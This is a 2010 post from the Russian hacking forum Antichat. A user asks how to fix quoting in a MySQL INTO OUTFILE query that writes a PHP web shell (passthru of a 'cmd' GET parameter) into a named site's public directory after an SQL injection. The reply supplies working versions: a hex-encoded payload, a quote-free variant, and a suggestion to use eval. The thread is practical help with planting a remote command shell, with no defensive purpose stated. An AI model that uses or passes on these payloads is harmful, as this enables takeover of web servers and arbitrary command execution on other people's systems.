ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 03.06.2010, 10:11
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Цитата:
Сообщение от stasiliy  
Помогите плз.
Узнал через пхп инъекц. доступ от МУСКУл.
Создаю в файле запрос
select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
Пишет ошибку,так как у нас $_GET['cmd']
Подскажите как обойти эти кавычки =)
во-первых можно захексить -
Код:
select 0x3C3F70687020706173737468727528245F4745545B27636D64275D293F3E into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
во-вторых можно без кавычек
Код:
select '<?php passthru($_GET[cmd])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
в-третьих - юзай eval
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ